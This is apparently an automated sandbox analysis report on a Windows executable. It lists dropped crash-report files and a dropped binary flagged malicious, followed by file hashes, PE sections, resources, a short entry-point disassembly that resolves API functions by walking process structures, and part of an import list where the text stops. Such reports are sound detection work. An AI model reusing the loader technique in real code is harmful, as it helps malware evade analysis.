                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.2.8.6.9.3.1.4.2.2.3.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.2.8.6.9.4.0.9.5.3.6.8.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.3.c.c.0.7.d.0.-.1.3.4.f.-.4.7.2.c.-.b.0.c.4.-.f.d.0.5.e.1.8.d.9.4.7.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.1.a.7.7.a.d.1.-.9.c.f.2.-.4.d.f.8.-.a.e.d.e.-.4.d.9.2.9.8.e.2.e.a.e.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.u.i.X.L.S...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.4.8.-.0.0.0.1.-.0.0.1.4.-.9.d.d.1.-.7.9.f.2.f.5.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.3.6.0.2.4.0.9.1.6.9.f.c.8.d.a.1.7.a.d.a.b.4.2.d.0.1.c.7.6.4.c.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.W.u.i.X.L.S...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.

                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERD8B5.tmp.dmp

                                        Download File
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Mini DuMP crash report, 14 streams, Fri Jul 26 00:51:33 2024, 0x1205a4 type
                                        Category:dropped
                                        Size (bytes):156746
                                        Entropy (8bit):1.8052572905135291
                                        Encrypted:false
                                        SSDEEP:384:8GZk5DBVAfzd6i0GqEz5lb3UMr2+ZO5BCgb7azHyn1aRD28oyk:8G29BVO8i1SSOzxSSWD1O
                                        MD5:3BF2EFF05297EF21E0B2D99BCB594818
                                        SHA1:CE583F1F2A32182B6F75610DA334B15E64C06BA7
                                        SHA-256:A3FBA04B6FC2CA0BED3A79298A188125B4D43269D2C40A0B03A1D4B9B6F3B737
                                        SHA-512:3A4F32A3B3EE488794026AC3D3ED00FF35E1887327795F1107E365AEF6AD86A997BB1113356CAB12AC7279F2895D700D30AA6DF85E1464C44D1BD72CABBF74AF
                                        Malicious:false
                                        Reputation:low
                                        Preview:MDMP..a..... .........f............t...............|.......d...fL..........T.......8...........T............7...,..........T...........@...............................................................................eJ..............GenuineIntel............T.......H.....f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERD9DF.tmp.WERInternalMetadata.xml

                                        Download File
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):8258
                                        Entropy (8bit):3.700485499807649
                                        Encrypted:false
                                        SSDEEP:192:R6l7wVeJJJ6E6YwN61IkG4gmfmJtpDM89bJVsfeDm:R6lXJH6E6Ya61IkZgmfmPJufL
                                        MD5:E4DB9B40A92B7217E3B46CB0E08A704C
                                        SHA1:843B7A11832D72EE530085F335DA25E1338FFBE6
                                        SHA-256:8318601B82DFC3CE3F95020FD774ACA3BB76C829DF2F5E848C4C678EBA3E5AC5
                                        SHA-512:E7935F16986DA4341E5BC22E1B5C4D124D5DC69DEBCE8747CA94E74E46F2C66748EFCFF213096E9227667DDB2310EE51891582975F487B01ADD1CEEABE56C245
                                        Malicious:false
                                        Reputation:low
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.9.6.<./.P.i.

                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERDA6C.tmp.xml

                                        Download File
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4551
                                        Entropy (8bit):4.456878638243328
                                        Encrypted:false
                                        SSDEEP:48:cvIwWl8zsNJg77aI99qWpW8VYjYm8M4JkdFvW4+q8oHsXg/xd:uIjfnI77L7VjJSlUg/xd
                                        MD5:1653ADE7D42D516B209FA43D314AB6F2
                                        SHA1:018D5F1211883F96E93C8E70C780B077B54988BD
                                        SHA-256:41A1ED95139A2F4EE4C3AE8970BC9B0AC3FE7C6B12666ECE6A39076C05068294
                                        SHA-512:20A486F71D515DE6EB496F15430A012BE44E61C9B1A8F4FD20355C7866CD19D2B62B8617769D918177773AF3D937DE8722FF1318162CEBA25E4335F50B264F77
                                        Malicious:false
                                        Reputation:low
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="427194" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD97.tmp.dmp

                                        Download File
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Mini DuMP crash report, 14 streams, Fri Jul 26 00:51:34 2024, 0x1205a4 type
                                        Category:dropped
                                        Size (bytes):24064
                                        Entropy (8bit):2.495191834009757
                                        Encrypted:false
                                        SSDEEP:96:5Q80w3OSnmZq0XxEsrXoJgPMxgLlHJi7Yvc79w0rhE15w3Ra7iSlK5WIkWI1MInQ:Z09rX8gE2OYUhwimcElKJGoyikIL
                                        MD5:755FD6EF8FB6799F4EB10E49344C5B49
                                        SHA1:162575BF487966BCDCD725D6CA8B111D537E3BFA
                                        SHA-256:20FA80B827A3646781CB0CDF4F14D7AAB8E7E41594A0A5139EEA5F4A5B717580
                                        SHA-512:C5C477145F4109B0C428B5A83BA29C2DFB8F99CF24F1DD5F4B0FB1B86D0C2309597624E9A8D520DFC360B9EA72A6734189F14B00AB33D735C65208102150CC4A
                                        Malicious:false
                                        Reputation:low
                                        Preview:MDMP..a..... .........f............4...............<...........J...........T.......8...........T...............xI..........8...........$...............................................................................eJ..............GenuineIntel............T.......0.....f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERDDE6.tmp.WERInternalMetadata.xml

                                        Download File
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):8336
                                        Entropy (8bit):3.70054072950984
                                        Encrypted:false
                                        SSDEEP:192:R6l7wVeJwV6I6YSYSU9v/7McgmfQzpDG89bWpsfmym:R6lXJS6I6YdSU9v/7gmfQ5WCfa
                                        MD5:AD96E522F143131E476FE4D88787761E
                                        SHA1:AD020E0044E9D9BB391B0322443F3CB679ACE899
                                        SHA-256:B3A07ADC364DF8260F20279F3FF3479E268568078D9EED01BAE74955C7A88A47
                                        SHA-512:580EEBA310D298D2298883144C93467A0532CD8B944F043496457E0FE1B2D63FEEAAF1A8FABAEECD92E84032491055B2A1326ECBB3AAD8246A2718A414B9CE24
                                        Malicious:false
                                        Reputation:low
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.7.2.<./.P.i.

                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERDE25.tmp.xml

                                        Download File
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4579
                                        Entropy (8bit):4.464326652582071
                                        Encrypted:false
                                        SSDEEP:48:cvIwWl8zsNJg77aI99qWpW8VYMYm8M4J+tQNFt+q8gqycSbXrLd:uIjfnI77L7V8J+uVVq7SbrLd
                                        MD5:35B67B13CD35406209427161CC475A0F
                                        SHA1:B4C5A148B622247ED095C64125BC899F9A723214
                                        SHA-256:063909B7346EFE64FD5DAD404F4842C583C4D459445959862741118B8EC3CBF9
                                        SHA-512:69DF1D57F63F6271BC0E7F2C893105B7A26D107FDA7000B4FA9FCDAA64240D20945C6CDAD1297743E46A2B8D444C81DF3604A5D7474DDE25E0A2139D74957AA1
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="427194" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                        C:\Users\user\AppData\Local\Temp\WuiXLS.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\7Y18r(193).exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):15872
                                        Entropy (8bit):7.031075575407894
                                        Encrypted:false
                                        SSDEEP:384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
                                        MD5:F7D21DE5C4E81341ECCD280C11DDCC9A
                                        SHA1:D4E9EF10D7685D491583C6FA93AE5D9105D815BD
                                        SHA-256:4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
                                        SHA-512:E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 92%
                                        Joe Sandbox View:
                                        • Filename: 7Y18r(212).exe, Detection: malicious, Browse
                                        • Filename: 7Y18r(216).exe.dll, Detection: malicious, Browse
                                        • Filename: 7Y18r(223).exe, Detection: malicious, Browse
                                        • Filename: builder_Release.exe, Detection: malicious, Browse
                                        • Filename: A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exe, Detection: malicious, Browse
                                        • Filename: BOTBINARY.EXE.exe, Detection: malicious, Browse
                                        • Filename: BkPack.exe, Detection: malicious, Browse
                                        • Filename: bss.exe, Detection: malicious, Browse
                                        • Filename: C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exe, Detection: malicious, Browse
                                        • Filename: builder_Release.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

                                        C:\Windows\appcompat\Programs\Amcache.hve

                                        Download File
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:MS Windows registry file, NT/2000 or above
                                        Category:dropped
                                        Size (bytes):1835008
                                        Entropy (8bit):4.374849821258931
                                        Encrypted:false
                                        SSDEEP:6144:kFVfpi6ceLP/9skLmb0iyWWSPtaJG8nAge35OlMMhA2AX4WABlguNXiL:kV10yWWI/glMM6kF7Jq
                                        MD5:2E9AE6A6EC6CB61878ED2E4FAE58199A
                                        SHA1:2D018A316F5D83326BD4CF288B05610031AE8028
                                        SHA-256:25C07974C8E2EF0CB44DD769211B62D7CBCD0F2FCEB781A9B587AB101229F161
                                        SHA-512:36E5D41BC68F3E529042FFF333942259C68923017A26DD95BCD92610DF7EA6227C1D393E2EC107DECA615A17F9C4D70EB5554E2AC537EBB9DC3DAE5FBA764C41
                                        Malicious:false
                                        Preview:regfC...C....\.Z.................... ....@......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....................................................................................................................................................................................................................................................................................................................................................K..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):6.865384550190376
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:7Y18r(193).exe
                                        File size:217'088 bytes
                                        MD5:3a085e2c496b3d2020401c3452b57aef
                                        SHA1:09754968722731fb208ddbebcc6c6a7cc9d42c7b
                                        SHA256:ba12343f978332fa8c76a99e384a9052b0f9ecc1bcf24bd25552832af77a03ef
                                        SHA512:f5bd05a3a87d2eafdc084b5900d69b34bf6270def6c63b3206987c83cd1a5209b5ae14a095729c00b8ca9f424489bcf11b5fc63c0ec89d8b7515765da2d28fb9
                                        SSDEEP:3072:mGmCsSSeDqwOo211BXydq3/CxrLgGolIWWi98mux/Xh0vFF1MY7glCFGCH:tDXDpf2lIq3/mPgaWWD9xKdFd7gUA
                                        TLSH:4724CF2236D48073E27766348B71C2928F27B8769B7198DF2B94096E1E752D2CFB4347
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.U...;...;...;.......;.a.....;.a...+.;.a...R.;.......;...:...;.a.....;.a.....;.a.....;.Rich..;.........PE..L.....$c...........

                                        File Icon

                                        Icon Hash:0f2c121128222d22

                                        Static PE Info

                                        General

                                        Entrypoint:0x7ba000
                                        Entrypoint Section:Iu9
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6324DD9A [Fri Sep 16 20:33:30 2022 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
                                        Import Hash:cf6c67a92b992938826c4e4ca9230c19

                                        Entrypoint Preview

                                        Instruction
                                        push ebp
                                        mov ebp, esp
                                        sub esp, 0000016Ch
                                        xor eax, eax
                                        push ebx
                                        push esi
                                        push edi
                                        mov dword ptr [ebp-24h], eax
                                        mov dword ptr [ebp-10h], eax
                                        mov dword ptr [ebp-14h], eax
                                        mov dword ptr [ebp-08h], eax
                                        mov dword ptr [ebp-0Ch], eax
                                        mov dword ptr [ebp-20h], eax
                                        mov dword ptr [ebp-18h], eax
                                        mov dword ptr [ebp-48h], 58697557h
                                        mov dword ptr [ebp-44h], 652E534Ch
                                        mov dword ptr [ebp-40h], 00006578h
                                        mov dword ptr [ebp-3Ch], 00000000h
                                        call 00007F85C1304A15h
                                        pop eax
                                        add eax, 00000225h
                                        mov dword ptr [ebp-04h], eax
                                        mov eax, dword ptr fs:[00000030h]
                                        mov dword ptr [ebp-28h], eax
                                        mov eax, dword ptr [ebp-04h]
                                        mov dword ptr [eax], E904C483h
                                        mov eax, dword ptr [ebp-04h]
                                        mov dword ptr [eax+04h], FFC4DFFCh
                                        mov eax, dword ptr [ebp-28h]
                                        mov eax, dword ptr [eax+0Ch]
                                        mov eax, dword ptr [eax+1Ch]
                                        mov eax, dword ptr [eax]
                                        mov eax, dword ptr [eax+08h]
                                        mov ecx, dword ptr [eax+3Ch]
                                        mov ecx, dword ptr [ecx+eax+78h]
                                        add ecx, eax
                                        mov edi, dword ptr [ecx+1Ch]
                                        mov ebx, dword ptr [ecx+20h]
                                        mov esi, dword ptr [ecx+24h]
                                        mov ecx, dword ptr [ecx+18h]
                                        add esi, eax
                                        add edi, eax
                                        add ebx, eax
                                        xor edx, edx
                                        mov dword ptr [ebp-30h], esi
                                        mov dword ptr [ebp-1Ch], edx
                                        mov dword ptr [ebp-34h], ecx
                                        cmp edx, dword ptr [ebp-34h]
                                        jnc 00007F85C1304B5Eh
                                        movzx ecx, word ptr [esi+edx*2]
                                        mov edx, dword ptr [ebx+edx*4]
                                        mov esi, dword ptr [edi+ecx*4]
                                        add edx, eax
                                        mov ecx, dword ptr [edx]
                                        add esi, eax
                                        cmp ecx, 4D746547h
                                        jne 00007F85C1304A64h
                                        cmp dword ptr [edx+04h], 6C75646Fh
                                        jne 00007F85C1304A5Bh

                                        Rich Headers

                                        Programming Language:
                                        • [ASM] VS2010 build 30319
                                        • [C++] VS2010 build 30319
                                        • [ C ] VS2010 build 30319
                                        • [IMP] VS2008 SP1 build 30729
                                        • [RES] VS2010 build 30319
                                        • [LNK] VS2010 build 30319

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x173680xa0.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b70000x2cb8.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4a700x40.text
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x10000x33c.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x176fa0x17800ccb83befb8420cbf08bebbdb751ab053False0.5150120511968085data6.3585335305359685IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .data0x190000x39d1640x16400a7c79281180313f0f4b5818a21f0b5abunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0x3b70000x2cb80x2e00ab5e90b7134f9013677ec329f0e0e3a5False0.4310461956521739data4.312487789475691IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        Iu90x3ba0000x50000x42007ec866fb2bcf22856a9e8eb91e3be04dFalse0.7775213068181818data6.934398937344117IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_ICON0x3b72200x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishFinland0.38537906137184114
                                        RT_ICON0x3b72200x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishNorway0.38537906137184114
                                        RT_ICON0x3b72200x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishSweden 0.38537906137184114
                                        RT_ICON0x3b7ac80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland0.4448874296435272
                                        RT_ICON0x3b7ac80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway0.4448874296435272
                                        RT_ICON0x3b7ac80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden 0.4448874296435272
                                        RT_STRING0x3b8de80x27eMatlab v4 mat-file (little endian) S, numeric, rows 0, columns 0Sami LappishFinland0.47335423197492166
                                        RT_STRING0x3b8de80x27eMatlab v4 mat-file (little endian) S, numeric, rows 0, columns 0Sami LappishNorway0.47335423197492166
                                        RT_STRING0x3b8de80x27eMatlab v4 mat-file (little endian) S, numeric, rows 0, columns 0Sami LappishSweden 0.47335423197492166
                                        RT_STRING0x3b90680x230dataSami LappishFinland0.48214285714285715
                                        RT_STRING0x3b90680x230dataSami LappishNorway0.48214285714285715
                                        RT_STRING0x3b90680x230dataSami LappishSweden 0.48214285714285715
                                        RT_STRING0x3b92980x3c6dataSami LappishFinland0.453416149068323
                                        RT_STRING0x3b92980x3c6dataSami LappishNorway0.453416149068323
                                        RT_STRING0x3b92980x3c6dataSami LappishSweden 0.453416149068323
                                        RT_STRING0x3b96600x460dataSami LappishFinland0.4473214285714286
                                        RT_STRING0x3b96600x460dataSami LappishNorway0.4473214285714286
                                        RT_STRING0x3b96600x460dataSami LappishSweden 0.4473214285714286
                                        RT_STRING0x3b9ac00x1f2dataSami LappishFinland0.4939759036144578
                                        RT_STRING0x3b9ac00x1f2dataSami LappishNorway0.4939759036144578
                                        RT_STRING0x3b9ac00x1f2dataSami LappishSweden 0.4939759036144578
                                        RT_GROUP_ICON0x3b8b700x22dataSami LappishFinland0.9705882352941176
                                        RT_GROUP_ICON0x3b8b700x22dataSami LappishNorway0.9705882352941176
                                        RT_GROUP_ICON0x3b8b700x22dataSami LappishSweden 0.9705882352941176
                                        RT_VERSION0x3b8b980x24cdata0.5527210884353742

                                        Imports

                                        DLLImport
                                        KERNEL32.dllWriteConsoleInputW, EnumDateFormatsExW, GetLocaleInfoA, GetDriveTypeW, _llseek, WriteConsoleOutputCharacterA, BuildCommDCBAndTimeoutsA, WriteConsoleOutputW, HeapAlloc, DeleteVolumeMountPointA, InterlockedIncrement, VerSetConditionMask, OpenJobObjectA, GetCommState, GetConsoleAliasA, InterlockedDecrement, GetCurrentProcess, GetSystemWindowsDirectoryW, QueryDosDeviceA, HeapFree, GetEnvironmentStringsW, WriteConsoleInputA, AddConsoleAliasW, CreateHardLinkA, SleepEx, GetFileAttributesExA, _lclose, SetTapeParameters, MoveFileWithProgressA, GetModuleHandleW, CreateNamedPipeW, LocalFlags, FindNextVolumeMountPointA, GetConsoleAliasesA, GetConsoleAliasesLengthA, ConvertFiberToThread, ExpandEnvironmentStringsA, ReadConsoleW, GetConsoleAliasExesW, WaitNamedPipeW, GetUserDefaultLangID, SetCommState, GetCommandLineA, CreateDirectoryExW, GetDriveTypeA, GetVolumePathNameW, GetCurrencyFormatW, ActivateActCtx, GetConsoleCP, GetSystemDirectoryW, SetFileShortNameW, LoadLibraryW, GetConsoleMode, SetCommConfig, _hread, GetCalendarInfoW, GetSystemWindowsDirectoryA, InterlockedPopEntrySList, GetFileAttributesA, GlobalFlags, HeapCreate, EnumSystemCodePagesA, SetTimeZoneInformation, SetSystemPowerState, WritePrivateProfileSectionW, TerminateProcess, ReplaceFileW, GetCompressedFileSizeA, SetThreadContext, CompareStringW, lstrlenW, GlobalUnlock, DisconnectNamedPipe, GetTempPathW, GetNamedPipeHandleStateW, EnumSystemLocalesA, GetPrivateProfileIntW, GetConsoleOutputCP, VerifyVersionInfoW, GlobalUnfix, FindFirstFileA, GetCurrentDirectoryW, GetProcAddress, RemoveDirectoryA, SetComputerNameA, GetProcessVersion, GetPrivateProfileStringA, OpenWaitableTimerA, Process32FirstW, LocalAlloc, IsWow64Process, BuildCommDCBAndTimeoutsW, AddAtomW, CreateEventW, GlobalGetAtomNameW, SetThreadIdealProcessor, FoldStringW, FoldStringA, GlobalFindAtomW, FindNextFileA, _lread, GetModuleHandleA, SetLocaleInfoW, CancelIo, GetProcessAffinityMask, FindNextFileW, GetStringTypeW, WriteProfileStringW, VirtualProtect, GetConsoleCursorInfo, QueryPerformanceFrequency, GetShortPathNameW, SetCalendarInfoA, SetProcessShutdownParameters, OpenSemaphoreW, ReadConsoleInputW, FindAtomW, GetWindowsDirectoryW, DeleteFileW, MoveFileWithProgressW, GetTempPathA, ReadConsoleOutputCharacterW, InterlockedPushEntrySList, TlsFree, EnumSystemLocalesW, GetVolumeInformationW, lstrcpyA, CloseHandle, 